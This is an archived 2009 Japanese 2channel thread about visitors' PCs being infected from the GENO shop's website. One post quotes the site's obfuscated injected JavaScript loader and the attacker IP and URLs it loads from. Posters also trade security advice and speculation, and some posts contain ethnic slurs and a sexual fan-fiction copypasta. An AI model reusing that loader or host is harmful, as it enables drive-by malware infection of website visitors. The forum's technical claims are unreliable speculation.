5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【注文0.1】Genoのサイトでウイルス感染…か?★2

1 : SM-3(愛知県):2009/04/05(日) 11:07:11.17 ID:kKy0G6v0 ?PLT(12002) ポイント特典 株主優待

中古PCとPCパーツの通販ショップGENO ttp://www.geno-web.jp/


【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/326-
326 名前:名無しさん[sage] 投稿日:2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
2台試して、2台とも起きた。
もしかしてウィルスに感染してる?


【注文0.1】Genoのサイトでウイルス感染…か?
http://tsushima.2ch.net/test/read.cgi/news/1238844402/

2 : PAC-3(岡山県):2009/04/05(日) 11:07:25.66 ID:AA4acSfj
「ルイズ・・・・・・、お前、可愛かったんだな・・・・・・。が、頑張ればできるじゃねぇか」
「なにそれ、可愛くなんかないもん」 「か、可愛いって。まるでレモンちゃんだ」
「レ、レモンちゃんじゃないわ。というかレモンちゃんてなによ」 「肌がすべすべで、レレレ、レモンちゃんだ」
夢中になって、ルイズの首筋に唇を這わせながら、才人は呟く。脳内はすでに花畑なので、
自分が何を言っているのか、才人自身が理解していなかった。
「ばかぁ・・・・・・。こんなことするサイトなんてキライなんだから・・・・・・。ちょ、や、やめ・・・・・・」
「わ。ここはもっとレモンちゃんじゃないか、こ、ここなんかどうしようもないほどにレモンちゃんだ」
「はう。・・・・・・わ、わたし、よくわかんないんだけど、ほんとにレモンちゃんなの?」
「そうだよ、とりあえずレモンちゃん恥ずかしいって言ってごらん」
沸いてる、というレベルを光年の単位で超えている才人の茹だったセリフだが、
ルイズも根は相当アレなので、なんだかそれがロマンチックな響きに聞こえた。
というか一旦こうなったら、ルイズはなんでもいいのだった。その辺の趣味は、才人よりある意味ひどい。
「レ、レモンちゃん恥ずかしい・・・・・・」
で、言った、頬を真っ赤に染め、とろんとした目で、口を半開きにしてルイズがそんなアレを言いやがったので、才人は激しく興奮した。

3 : 市民団体(愛知県):2009/04/05(日) 11:08:26.08 ID:rwU+x6l/
GENOで河童30個買った思い出

4 : PAC-3(東京都):2009/04/05(日) 11:09:07.33 ID:3UiVG5bn
>>1にリンク貼ってるのはわざとか

5 : SM-3(catv?):2009/04/05(日) 11:09:41.52 ID:Bxn+Har8
>>1
http://www.geno-web.jp/
踏みまくった 何ともない

6 : PAC-3(dion軍):2009/04/05(日) 11:09:49.68 ID:VcorPnoo ?DIA(127000)
>>2
はえーよ

7 : SM-3(東京都):2009/04/05(日) 11:09:58.85 ID:860lpsay
>1
リンク張りやがって。感染させようとしてるだろ。

8 : SM-3(catv?):2009/04/05(日) 11:10:16.31 ID:r/ZBCNiy
これ踏んだらPCの中にある主要なファイルが抜き取られるらしいね。

9 : PAC-3(東京都):2009/04/05(日) 11:10:58.90 ID:/V7w2/WB
おまえの恥ずかしい緊縛画像が!

10 : SM-3(dion軍):2009/04/05(日) 11:11:36.94 ID:2bZ6N/4D
>>5
危険URLを指摘すると毎回このレスがつくな。

11 : SM-3(長崎県):2009/04/05(日) 11:13:41.39 ID:3NYgsNIc
余裕の2ゲット

Adobe Readeだけじゃなく、Flash Playerも不味いとのことだが・・・
本当だろうか?

それと各アンチウイルスソフトの対応はどう?

12 : SM-3(東京都):2009/04/05(日) 11:13:59.87 ID:860lpsay
今北産業の人へ
・最新版のWindowsUpdateとadobeAcrobatの9.1であれば感染しない。
・ファイル作成を検出できたアンチウイルスソフトは40のうち10だけ。
・結論、管理もしてないようPCでアクセスすれば余裕で感染する。

13 : PAC-3(東京都):2009/04/05(日) 11:14:14.93 ID:/V7w2/WB
GENOネット通販責任者の阿部!さっさと行動しろ!

14 : 九条(東京都):2009/04/05(日) 11:14:35.35 ID:hHdfNJCh
おまえらオススメのNoscriptとFoxit入れた
覗いてくる

15 : SM-3(京都府):2009/04/05(日) 11:15:01.89 ID:tFxFnPDR
>>1
http://www.geno-web.jp/
踏みまくった ・・・
ノートン反応した




16 : PAC-3(石川県):2009/04/05(日) 11:15:01.50 ID:T2P9uiCh
感染したらPCの挙動おかしくなるだけ?
何か抜かれてたりはしないの?

17 : PAC-3(アラバマ州):2009/04/05(日) 11:15:42.41 ID:t/pdQ5l5

GENOに社会的制裁をあたえたいんだけど

どうすればいいの?

18 : SM-3(東京都):2009/04/05(日) 11:16:32.34 ID:NlHWM1T9 ?2BP(1151)

火狐でアクセスしたが、即効でタブ閉じたんだが

19 : PAC-3(愛知県):2009/04/05(日) 11:16:33.52 ID:qUTthbiB
はやくまとめてくれよ
アクロバットがどうのこうのとかなんとか

20 : PAC-3(栃木県):2009/04/05(日) 11:16:51.35 ID:rsCG2HTn
>>12
フラッシュもだろ

21 : SM-3(catv?):2009/04/05(日) 11:17:21.97 ID:AT5Zmxg8
買おうと思ってたのにアクセスする気が無くなったじゃないか

22 : PAC-3(東日本):2009/04/05(日) 11:17:31.93 ID:0wUDmBbt
▽検出率テスト比較
http://www.av-comparatives.org/seiten/ergebnisse_2008_08.php

23 : PAC-3(東日本):2009/04/05(日) 11:17:43.69 ID:0wUDmBbt
▽オンライン ウィルス スキャン
・CA Anti-Virus http://www3.ca.com/securityadvisor/virusinfo/scan.aspx
・Norton http://security.symantec.com/sscv6/default.asp?productid=symhome)#id=jp&venid=sym
・Gdata http://www.gdata.co.jp/onlinefilescan/
・マカフィー http://jp.mcafee.com/root/mfs/default.asp
・ウィルスバスター http://www.trendmicro.co.jp/hcall/
・カスペルスキー http://www.kaspersky.com/virusscanner
・F-Secure http://support.f-secure.com/enu/home/ols.shtml
・ウイルスチェイサー http://www.viruschaser.jp/support_online.html
・BitDefender http://www.bitdefender.com/scan8/index.html
・command-on-demand http://www.commandondemand.com/
・Dr.Web http://www.drweb.com/
・Panda ActiveScan  http://www.pandasoftware.com/activescan/com/activescan_principal.htm

24 : SM-3(長崎県):2009/04/05(日) 11:17:48.29 ID:3NYgsNIc
>>20
やっぱりか・・・

25 : SM-3(大阪府):2009/04/05(日) 11:17:52.59 ID:Ule4VdBX
ラトビアにクレカや暗証番号全部つつぬけ
悪用させる可能性大。一番性質の悪いタイプのウイルス。
しかもまだセキュリティソフトが対応し切れてないという。

26 : 市民団体(愛知県):2009/04/05(日) 11:18:13.79 ID:rwU+x6l/
>>12
情弱しか感染しないのか
つまんね

27 : 遺憾の意(埼玉県):2009/04/05(日) 11:19:50.04 ID:GW1OYdbR
新型ウイルス踏んでも なんともない って言える大人かっこいいです。

ウイルス踏みましたよ って教えてくれるウイルスもあるんですかね

28 : PAC-3(愛知県):2009/04/05(日) 11:20:36.20 ID:YuFf2eKE
こういうのってGENOのページで入力したクレカ番号とか以外にも、そのPC内の他の暗証番号とか
入力情報が抜かれるの?

29 : SM-3(埼玉県):2009/04/05(日) 11:20:48.45 ID:KVAjhyIK
9.1はも落ちると聞いたが、感染はしないけど落とされるってことか

30 : 市民団体(西日本):2009/04/05(日) 11:20:49.35 ID:hPqD5s7R
無駄に重くて危険なAcrobatなんか入れるな
foxitあれはいいものだ

31 : 遺憾の意(埼玉県):2009/04/05(日) 11:21:14.28 ID:Yh1MiCcT
流行の最先端をいくGENOすげぇwww

32 : 市民団体(大阪府):2009/04/05(日) 11:22:05.12 ID:qXI42CVf
GENOが故意で埋め込んでるのなら残念だ

33 : 九条(北海道):2009/04/05(日) 11:22:10.98 ID:gdR7/JY/
Macだけどなんともないわ…
HPの複合プリンタやすいなー。これインクの詰め替えとかできるタイプかな。
http://www.geno-web.jp/Goods/GA09078690


34 : PAC-3(中部地方):2009/04/05(日) 11:22:18.96 ID:W64d5sPe
>>1
http://www.geno-web.jp/
ページファイルがでかいだけで無害だろこれ

35 : SM-3(大阪府):2009/04/05(日) 11:23:35.94 ID:Ule4VdBX
>>28
当然というかそれが目的のウイルスだろ。
4月2日付の最新型だからなー。今回は踏んでしまう人も多いだろ。
カスペですら対応遅れたしなー。ノートンバスター先生なんかまだ。

36 : SM-3(catv?):2009/04/05(日) 11:23:42.49 ID:sC3uBjgu
誰かさ今回のウイルスおくれ。

37 : 遺憾の意(大阪府):2009/04/05(日) 11:24:13.08 ID:20ckNQTG
>>12
最新版のWindowsUpdateとadobeAcrobatで踏んでしまって
問題が発生したので終了しますとなり、ブラウザが落ちましが
adobeAcrobat自体は全く起動しませんでした。
これって感染までのプロセスが完了していないと考えていいですか?
カスペは無反応(最新データ)で検索しても検知しませんでした。

38 : PAC-3(長崎県):2009/04/05(日) 11:24:32.03 ID:iFzuB+GF
Adobe Readerは勿論入れてないけど、Flash Playerは入れてるな。

39 : PAC-3(東京都):2009/04/05(日) 11:25:13.49 ID:HvXPLNzh
仮想メモリ不足でブラウザ落ちるよ。

40 : PAC-3(神奈川県):2009/04/05(日) 11:26:51.69 ID:9qZMyZft
AdobeReaderとAcrobatって違うのか

41 : SM-3(静岡県):2009/04/05(日) 11:27:43.73 ID:l+MfdV6b
犯人逮捕して死刑にすれば解決じゃん
これだけの人を不安に陥れた罪は重いだろ

42 : SM-3(東京都):2009/04/05(日) 11:27:44.88 ID:R43SLTbW ?2BP(1151)

>>35
マカフィーはどうなんだろ?

43 : 遺憾の意(埼玉県):2009/04/05(日) 11:27:54.15 ID:Yh1MiCcT
GENO開いてから211.1.219.73からいっぱいアクセスがくる。こいつ踏み台にでもなってるのか

44 : SM-3(埼玉県):2009/04/05(日) 11:28:14.56 ID:KVAjhyIK
>>40
AcrobatはPDF作れるソフト(もちろん読める)

AcrobatReaderは読むだけのフリーソフト
今はAdobeReaderという名前になってる

45 : SM-3(大阪府):2009/04/05(日) 11:28:20.95 ID:Ule4VdBX
AdobeはともかくFLASH入れてないPCは少ないよなー。
いまだにGENOが放置状態のままなのが恐ろしい。
どんなけ被害拡大するやら。これはもうGENOは加害者といっても。

46 : SM-3(福岡県):2009/04/05(日) 11:28:54.23 ID:cH/yn/ac
ラトビアって恐ロシアのダミー会社とかありそうだよなぁ
んでモスクワ経由でオレらの情報が支那・朝鮮へ売られる、と・・・


47 : ◆MiMIZUNCjA :2009/04/05(日) 11:29:35.23 ID:BNRSRhzB ?PLT(12041)

まだ解決していないのか。。。ふつーはサーバ止めるだろう。。。ふつーなら

48 : 遺憾の意(石川県):2009/04/05(日) 11:29:48.51 ID:+9bjQsyQ
GENOは日曜なんで休みか?
のんきだねー

49 : SM-3(catv?):2009/04/05(日) 11:30:25.39 ID:Bxn+Har8
まったく問題ないわけだが
これ風流の呂布だろ

50 : PAC-3(アラバマ州):2009/04/05(日) 11:30:37.88 ID:NlwUzjfa
ゴミ屋だし
売王の評価が相対的に上がった

51 : PAC-3(宮崎県):2009/04/05(日) 11:31:30.47 ID:dLvh0j0o
Opera+Antivirで無反応
逆に怖いのだが

52 : PAC-3(長崎県):2009/04/05(日) 11:31:57.29 ID:iFzuB+GF
>>45
対応するのは月曜日っぽいね

53 : SM-3(静岡県):2009/04/05(日) 11:32:13.27 ID:cRXmGUte
火狐最新版で踏んだ
なんかacrbatみたいな文字が書かれたダイアログが二度表示された
両方ともNOを選んだ
その後、重くなって落ちて、OS再起動をした
cmd.exeは動いていない
アクロバットリーダは6.0
これってどうですか?
このまま使い続けて問題ないですか?
ネット通販でクレカ決済はよく使うんだけど。
そこまで騒ぐほどのことなの?

54 : 市民団体(神奈川県):2009/04/05(日) 11:32:22.36 ID:Lu9lgr48
悪質業者w

55 : SM-3(チリ):2009/04/05(日) 11:32:49.82 ID:k76TL7Mj
>>53
あーあ

56 : PAC-3(コネチカット州):2009/04/05(日) 11:32:50.96 ID:jisCmmPw
とりあえずタスクマネージャでcmd.exeが動いてなきゃセフ?

57 : SM-3(長屋):2009/04/05(日) 11:32:57.22 ID:6M5Ujjsf
お憑かれさまです

58 : SM-3(アラバマ州):2009/04/05(日) 11:33:06.24 ID:3jR2LB2Z
最近GENOを踏んだやつはクリーンインストール必須ってことか
貴重な日曜日オワタ\(^o^)/

59 : SM-3(愛知県):2009/04/05(日) 11:33:15.55 ID:vXoNm6eB
>>53
どんまい

60 : 市民団体(関西地方):2009/04/05(日) 11:33:32.94 ID:QaHna1+F
やっとスレ見つけた。
今度からスレタイに「マルイ」も入れて欲しい。
ずっと「マルイ通販」で検索してたよ。

61 : SM-3(静岡県):2009/04/05(日) 11:33:41.36 ID:cRXmGUte
>>55
お前みたいのゴミは一番いらないからレスしなくていいよ

62 : PAC-3(アラバマ州):2009/04/05(日) 11:34:12.56 ID:7CBuezyI
とりあえずリカバリしたわ手間カケさせやがって
ゲノには謝罪と賠償を請求する


63 : PAC-3(関西地方):2009/04/05(日) 11:34:22.39 ID:7CQHHdwE
価格ウイルスはすげー問題になったが
今回のGENOのはどうなるの?
故意なら業者タイーホ?

64 : SM-3(長屋):2009/04/05(日) 11:34:50.76 ID:6M5Ujjsf
>>61
ハンカチ貸してやるよ

65 : SM-3(アラバマ州):2009/04/05(日) 11:34:52.66 ID:3jR2LB2Z
テポドン発射キタ━━━━━(゚∀゚)━━━━━!!!!

66 : PAC-3(愛知県):2009/04/05(日) 11:34:56.76 ID:qUTthbiB
よくわからんけど
もうゲロのページを開く木にはなれない


67 : SM-3(東京都):2009/04/05(日) 11:34:57.94 ID:860lpsay
>>16
感染するとラトビアにトラフィックを飛ばします。
何を漁ってるのかは不明。

68 : SM-3(catv?):2009/04/05(日) 11:34:58.63 ID:sC3uBjgu
やばいのは毎度のことでIEエンジン使いだけじゃね?

69 : SM-3(埼玉県):2009/04/05(日) 11:34:59.88 ID:7aLyj6pM
EM-netと同じ。誤報。

70 : 市民団体(コネチカット州):2009/04/05(日) 11:35:18.17 ID:YCYjsszN
>>61
ご愁傷様

71 : SM-3(愛知県):2009/04/05(日) 11:35:27.86 ID:vXoNm6eB
ミサイルきたみたいだな

72 : SM-3(福岡県):2009/04/05(日) 11:35:27.74 ID:fwhmuJEn
放置してる時点で故意と同罪

73 : SM-3(catv?):2009/04/05(日) 11:35:44.57 ID:UTsCkXf8
>>53
あーあー


74 : SM-3(チリ):2009/04/05(日) 11:36:00.77 ID:k76TL7Mj
>>61
涙目で内心ドキドキしてるんだろ

75 : PAC-3(神奈川県):2009/04/05(日) 11:36:13.43 ID:9qZMyZft
>>44
AdobeReaderでもアウトなの?
geno開いてもブラウザ落ちるだけで特にReaderが起動する様子なかったけど

76 : SM-3(関西地方):2009/04/05(日) 11:36:21.36 ID:/Ezbsog7
別にリカバリしなくても、システムの復元だけでいいんじゃねえの?

77 : 市民団体(愛知県):2009/04/05(日) 11:36:31.77 ID:rwU+x6l/
>>61
涙ふけよ

78 : SM-3(東京都):2009/04/05(日) 11:37:12.20 ID:860lpsay
>>51
antivirは検出しません。
Operaで感染するかどうかは未確認です。

79 : PAC-3(東京都):2009/04/05(日) 11:37:17.64 ID:Z9rJC4ry
ここのXPのDSP版安かったからサイト探してて結局見つからなかったんだけど
この状況見てると勝ち組でおk?

80 : SM-3(東京都):2009/04/05(日) 11:44:09.82 ID:860lpsay
>>53
アクロバットリーダのセキュリティホールをついてくるタイプなので6.0では話にならないが
古すぎてウイルス自体が不具合起こして感染しないラッキーな場合もありえる。
アンチウイルスが検出できるタイプかどうかにかかってる。
ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a

81 : PAC-3(愛知県):2009/04/05(日) 11:49:07.65 ID:YuFf2eKE
>>35
そうなんだ!
一応アマゾンとか通販は別のPCでやってるしNo Scriptも入れてるし大丈夫かな。
そもそもここ3日くらいは踏んでないからよかった

82 : PAC-3(大阪府):2009/04/05(日) 11:50:55.77 ID:zPDZrtCU
Firefoxと9.1で何とも無いようだが

83 : SM-3(京都府):2009/04/05(日) 11:51:03.06 ID:0i/+YZl6
No Scriptで回避余裕過ぎワロタwwwwwwwwwwwwwwwwwwwwwww

84 : PAC-3(徳島県):2009/04/05(日) 11:51:24.74 ID:cvRoK8Nh
調べてみた。
やっぱなんかある

<script language="JavaScript" type="text/javascript" src="http://www.geno.co.jp/xmlrss/osusume_shouhin.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.geno.co.jp/xmlrss/osusume.js"></script>

<!--
document.write(unescape('%3C4x4sWXkcr4Si4x4plct4x4%20P0srP0cWXk%3DC2%2F%2F4x49lc4lc%2EP02C247lc
%2E4S2%2E1lc95%2FP0jP0qu4x4erP0y%2Ejs%3E4x4%3Cmb%2FC2s4x4cript4S%3E').replace(/WXk|4S|P0|4x4|mb|lc|C2/g,""));
-->

<script src=//94.247.2.195/jquery.js></script>

unescape('fq%3CssoWcOTHriDpgpsoWt%20sOTHrc%3DOTHhDpgtsoWtDpgp:%2F%2F94soW%2EVV24Rp7%2E2Rp%2E19U6
k5%2FneU6kwsfq%2F?iVVd%3Dfq1fq0RpZ%3E%3C%2FH5rscDpgrRpiptRp%3E').replace(/soW|VV|U6|rV|fq|OTH|
H5r|Dpg|Rp/g,"").replace(/Z/,navigator.appName.charAt(0)=='M'?'0':'1'));

こんな感じで

<script src=http://94.247.2.195/news/?id=100></script>

で、実体

ttp://94.247.2.195/news/?id=2
ttp://94.247.2.195/news/?id=2

出かけてくるから後は頼んだw

85 : PAC-3(アラバマ州):2009/04/05(日) 11:51:26.22 ID:OHBKrgrC
本当、アドビのソフトはセキュリティホールに利用されまくっているな!

86 : PAC-3(アラバマ州):2009/04/05(日) 11:51:35.65 ID:C28Y3hZ/
普通に考えて個人情報も漏れてるよね

87 : PAC-3(徳島県):2009/04/05(日) 11:52:30.99 ID:cvRoK8Nh
所々h抜き忘れてる・・・orz

アクセスするなよ!

88 : PAC-3(長崎県):2009/04/05(日) 11:52:54.11 ID:iFzuB+GF
>>84
北チョンのミサイルと新種のウイルス!?
これは!?
+に帰るか・・・。

89 : 遺憾の意(埼玉県):2009/04/05(日) 11:53:10.06 ID:Yh1MiCcT
?id=2がPDFで
?id=3がフラッシュ

90 : SM-3(宮崎県):2009/04/05(日) 11:53:30.64 ID:I8HdLKtq
GENO普通に見れるじゃん…と思ったら急に重くなった。opera使用。
マカフィー先生反応なし
operaが落ちた

91 : SM-3(静岡県):2009/04/05(日) 11:53:32.70 ID:cRXmGUte
○一日放置ってどんだけなんだ
まぁたいしたことはないんだろうがな
念のため入れなおすか
ブラウザとJANEとwarrockいれるだけだし

92 : SM-3(アラバマ州):2009/04/05(日) 11:55:06.06 ID:o0tkYFrM
Adobeのアップデートがやたらと重い

93 : 市民団体(東京都):2009/04/05(日) 11:55:31.53 ID:KCvDZWRj
これって一旦感染したらウィルスソフトで削除できないの?

94 : 遺憾の意(広島県):2009/04/05(日) 11:56:11.38 ID:jHw1bv+q
感染したかどうか確認する方法ってあるの?
オンラインスキャンでどれか対応してる?

95 : SM-3(静岡県):2009/04/05(日) 11:56:36.54 ID:cRXmGUte
ウイルスソフトはkingsoftだな
あVは見つけただけで大騒ぎな心臓に悪いアクションが嫌いでやめた
まぁ踏んだ人の80%がそのまま使い続けるんだろうがなw

96 : SM-3(アラバマ州):2009/04/05(日) 11:57:46.20 ID:o0tkYFrM
>>93
dllと癒着しているので再インスコしか手段が無い

97 : 遺憾の意(埼玉県):2009/04/05(日) 11:58:08.04 ID:GW1OYdbR
>>49
わざわざ問題あるように動作してくれるパスワード抜き取り系ウイルスってあるの?w

98 : 市民団体(長屋):2009/04/05(日) 11:59:05.11 ID:NF3JOGhX
FirefoxならNoScriptで回避余裕
Operaはユーザースクリプトのためにスクリプト常時有効だから死亡

99 : PAC-3(岡山県):2009/04/05(日) 11:59:17.44 ID:OKoee8K6
ウイルスとかどうでもいいが
木曜あたりであったスレでぽちったパソコン届くのか?
金振り込んだぞ、トンズラとかかんべんな

100 : SM-3(大阪府):2009/04/05(日) 11:59:24.90 ID:Ule4VdBX
今の所は感染したら駆除できるソフトはない。
やっと一部のソフトがサイト踏んだ時に検知できるようになっただけ。
残念ながらクリーンインストールしかない。

101 : SM-3(関西地方):2009/04/05(日) 12:00:15.79 ID:l9dSRGF4
仮想マシンで踏んでみたらxpSP3の素の状態では反応なしのまま
通常のように見えて裏で「94.〜」アクセス?

IE7+xpsp3+reader8.14+flash9で「microsoft database〜」のポップアップ、ブラウザは落ちなかった
IE7+xpsp3+reder9.1+flash10でもポップアップ+IEテンポラリ一杯表示(RAMDISK)、ブラウザ落ち

どちらもキャンセルで通常表示できたように見える・・・2回目以降も通常表示できたかのように見える。
初回のみ、何か気持ち悪い・・・データ抜かれて2回目以降は通常通り振舞うのか?

2日も放置とか、ショッピングサイトとしてありえない
こんな状態なら、安いんだけど気持ち悪いし当分買う気起きない・・・


102 : SM-3(静岡県):2009/04/05(日) 12:00:28.64 ID:fTzsppHx
foxitだから問題ないな

103 : PAC-3(東京都):2009/04/05(日) 12:00:42.40 ID:SuvOwbKl
いんとらーねっつ恐いおー><

104 : PAC-3(神奈川県):2009/04/05(日) 12:01:18.17 ID:9qZMyZft
とりあえず復元しとくか

105 : 九条(catv?):2009/04/05(日) 12:01:52.93 ID:6oVynHTI
感染したか、HiJackThisとかで分からない?

106 : PAC-3(長崎県):2009/04/05(日) 12:02:25.10 ID:iFzuB+GF
>>96
そこまで悪質なのかよ・・・

107 : SM-3(静岡県):2009/04/05(日) 12:02:50.26 ID:cRXmGUte
システムの復元で戻せばおkなの?

108 : PAC-3(愛知県):2009/04/05(日) 12:03:07.75 ID:qUTthbiB
君子危うきに近寄らずというのにお前たちはわざわざ踏みに逝くんだな

109 : PAC-3(東京都):2009/04/05(日) 12:03:14.39 ID:Z9rJC4ry
このスレのdatに感染してそう

110 : SM-3(静岡県):2009/04/05(日) 12:03:20.39 ID:cRXmGUte
この手のスレで一番たちの悪いやつが不安にさせるような書き込みを
喜んでする朝鮮人

111 : SM-3(チリ):2009/04/05(日) 12:04:03.20 ID:k76TL7Mj
ID:cRXmGUteは只今再インスコ中です

112 : SM-3(catv?):2009/04/05(日) 12:04:47.73 ID:G3IZnl5U
>>110
だよな
何の問題も無いのにな

113 : SM-3(東京都):2009/04/05(日) 12:05:31.15 ID:R43SLTbW ?2BP(1151)

結局,Acrobatは起動しなかったんだが。
cmd.exeも動いていないし。

、まあ、念のためHub抜いとこ

114 : SM-3(東京都):2009/04/05(日) 12:06:20.49 ID:860lpsay
>>110>>112
問題ないならそう主張すればいいだろ。
ROMってる人たちは双方の意見を見て
どちらが正しいか結論下すわけだし。
問題ない問題ないしか言わないんじゃ
単に問題を矮小化してるだけとしか思えないじゃん。

115 : SM-3(静岡県):2009/04/05(日) 12:06:26.58 ID:cRXmGUte
危険性を単純に指摘するレスではない
わざと不安にさせてやろうっていう意図を持っている
生粋の朝鮮人がいるでしょ。
自分でも気づいてないうちにそういうことをしているんだろう
血は争えないね

116 : PAC-3(長崎県):2009/04/05(日) 12:06:48.41 ID:iFzuB+GF
>>114
放っておけ
触らぬ気違いになんとやらだ

117 : SM-3(アラバマ州):2009/04/05(日) 12:08:06.95 ID:QfiF25I+
Operaは行く前にF12->JavaScriptを有効にするをOFF,プラグインを有効にするをOFFでおk
最強伝説

118 : SM-3(東京都):2009/04/05(日) 12:08:13.80 ID:860lpsay
>>115
意味不明。なら、いかに安全か主張すればいいだろ。
2chで自分にキモチの良い意見以外は認めないとか
頭くさってんのか?

119 : SM-3(アラバマ州):2009/04/05(日) 12:08:18.69 ID:bgG3HYOY
2スレ立ったのかw
ここのGENOのバックエンド作ってる会社も点プレに入れといてやれ

120 : SM-3(アラバマ州):2009/04/05(日) 12:10:03.10 ID:o0tkYFrM
>>115
全くだな何が楽しくてそういう行為に走るのやら・・・・
虚しくならないのかねぇ

121 : 九条(山梨県):2009/04/05(日) 12:10:09.59 ID:QfrUwYaL
この会社土日休みなのか?

122 : 九条(東京都):2009/04/05(日) 12:10:13.26 ID:kHvtMnjB
検知してブロックしたから問題ないぜ・・・と思ったら
いつもあるはずのウイルスバスターの常駐アイコンが無くなり、
ウイルス検索等すべての機能が使用不可になった

今までいろいろ踏んだけど、今度のはかなり強力なやつだと思うけどな
何の問題もないことはないだろ・・・

123 : 九条(福島県):2009/04/05(日) 12:10:34.21 ID:bqNxg0MU
javaとかflashとか使うサイト多すぎるよね

124 : 遺憾の意(岐阜県):2009/04/05(日) 12:10:35.19 ID:BVjTlbXj
感染したかどうかどこでわかる?
タスクマネージャのプロセスでなんか見える?

125 : SM-3(catv?):2009/04/05(日) 12:10:39.06 ID:sC3uBjgu
ウイルスセキリュティはゼロが一番w
ttp://www.geno-web.jp/Goods/GA07288700

126 : SM-3(関西地方):2009/04/05(日) 12:10:42.26 ID:l9dSRGF4
115>
煽りで朝鮮とかいうのは痛い子。
ミサイル打ち込むような馬鹿な国なのはみんな知ってることwww



127 : SM-3(アラバマ州):2009/04/05(日) 12:11:52.95 ID:o0tkYFrM
>>121
通販ショップだと土日祝は休みって結構有る

128 : 遺憾の意(長屋):2009/04/05(日) 12:12:13.93 ID:KozJbm+4
このスレ開いた瞬間IEが開いて
ひたすらタブ増やしていきやがった
なんだ?だれだ?お前か!

129 : SM-3(静岡県):2009/04/05(日) 12:12:30.81 ID:cRXmGUte
122さんそれはほんとのことなんですかぁ?

130 : SM-3(東京都):2009/04/05(日) 12:12:57.09 ID:R43SLTbW ?2BP(1151)

>>127
 でも、店頭はやってるから、連絡要員はいるだろ。

131 : 九条(福島県):2009/04/05(日) 12:13:03.21 ID:bqNxg0MU
>>128
それは別の問題のような気がするw

132 : SM-3(長屋):2009/04/05(日) 12:13:15.55 ID:W2FUcYj+
Adobereaderなんてそもそも入ってないんだけど・・・影でこっそり感染してますか?

133 : 九条(群馬県):2009/04/05(日) 12:13:40.86 ID:IhgO1ezG
>>124
コマンドプロンプト開いてないのにcmd.exeが動いてないか。
ルートフォルダにu.bat等の変なファイルはないか。
とか?

134 : PAC-3(アラバマ州):2009/04/05(日) 12:14:11.92 ID:GF02GznY ?PLT(14437)

再起動後にcsrss.exeのメモリ使用量が10,000Kを超えてたら…

135 : SM-3(埼玉県):2009/04/05(日) 12:14:18.76 ID:4UO/ejzT
感染とかVIPかよ

136 : 遺憾の意(埼玉県):2009/04/05(日) 12:14:38.98 ID:GW1OYdbR
AdobeReaderが入ってなくてもFlashPlayerがはいってれば危険があるとテンプレに入れるべきだな

137 : PAC-3(神奈川県):2009/04/05(日) 12:15:18.31 ID:mrpAzD5L
アウトなのはトップページのみなの?

138 : PAC-3(福岡県):2009/04/05(日) 12:15:26.97 ID:mB5miGOJ
絵スレを見れば絵を描きたくなり
車スレを見れば車が買いたくなり

ウリルススレを見れば(ry

139 : PAC-3(dion軍):2009/04/05(日) 12:15:49.48 ID:QauaTwqc
踏んじゃったのでカスペスキャンしようとしたらこんな表示が出てスキャン出来ねえ
http://www3.uploda.org/uporg2142314.jpg
ネットに接続してないわけないだろ!もう駄目ぽ

140 : 遺憾の意(埼玉県):2009/04/05(日) 12:15:55.93 ID:GW1OYdbR
はやくGenoから公式にアナウンスして欲しいんだが。
無害なのか有害なのか対処法や事実ならば謝罪など

141 : SM-3(catv?):2009/04/05(日) 12:16:52.35 ID:Y48zODdQ
感染してるかわからないって最強のウイルスだな畜生

142 : SM-3(dion軍):2009/04/05(日) 12:17:21.35 ID:NBq2nygT
geno終ったなw
ここのurlあぼーんにしておくか

143 : SM-3(東京都):2009/04/05(日) 12:18:04.33 ID:860lpsay
>>139
ウイルスがアンチウイルスの機能を止めるために
hotsリスト書き換えてんだな。よくあること。

144 : PAC-3(長崎県):2009/04/05(日) 12:18:23.43 ID:iFzuB+GF
>>132
flashでもアウトです

145 : 市民団体(沖縄県):2009/04/05(日) 12:18:43.98 ID:Dv1AWjYv
PDFビューワー「Foxit Reader」v3.0とv2.3に複数の脆弱性
www.forest.impress.co.jp/article/2009/03/10/foxitreader30b1506.html

146 : PAC-3(埼玉県):2009/04/05(日) 12:19:56.28 ID:ReGRs1CJ
まさにジェノサイドってね

147 : SM-3(長屋):2009/04/05(日) 12:20:29.63 ID:x+r1HV65
>>143
低スキルのくせに適当なこと言うなよwwwwwwwwwww


148 : 九条(群馬県):2009/04/05(日) 12:21:01.23 ID:IhgO1ezG
>>137
試しにメモリーカード・その中の適当な商品のソース見てみたが該当js読んでたよ。

149 : 市民団体(アラバマ州):2009/04/05(日) 12:21:32.02 ID:Th8cmjdr
今ごろアップデート通知w

150 : SM-3(大阪府):2009/04/05(日) 12:21:36.40 ID:Ule4VdBX
4月2日付発見の新型だからね。今の段階ではセキュリティソフトは無力。
自己防衛してるかどうか。でもflashの方はひっかかる人はどうしてもでる。
この瞬間にも各所に貼られまくって、被害者増殖中だ。GENO自主閉鎖しろ!!

151 : SM-3(catv?):2009/04/05(日) 12:22:34.56 ID:Y48zODdQ
AVGのウイルスDB 270.11.41/2041 から新しいの来てない? 全然更新できないけど

152 : SM-3(関東):2009/04/05(日) 12:22:56.94 ID:Ga/s5YYi
踏んでも何も変わらなかったぞ
強いて言えば、マウスの故障が直ったことくらい

153 : SM-3(静岡県):2009/04/05(日) 12:24:11.50 ID:cRXmGUte
いくらでもある方法に対処するなんて無理だよ
結局運でしょこんなの。
ここみて踏んだのならともかく、携帯音楽プレーや0− 通販
でぐぐって飛んで感性なんてありえない
なんで通販サイトのトップページ見て感染なんだ
ここが一番おかしい

154 : 九条(東京都):2009/04/05(日) 12:24:17.09 ID:kHvtMnjB
>>129
ほんとだよ
おれのはアクロバット起動したけど読込エラーになった
バスターは怪しいファイルを検知して隔離してくれたけど、刺し違えたらしく完全に沈黙
いろいろやって今は復活したように見えるけど・・・まだ何となくあやしい
ほんとうにむかつく・・・

155 : SM-3(愛知県):2009/04/05(日) 12:24:17.99 ID:vXoNm6eB
これはVIPの糞ガキを駆逐するチャンス

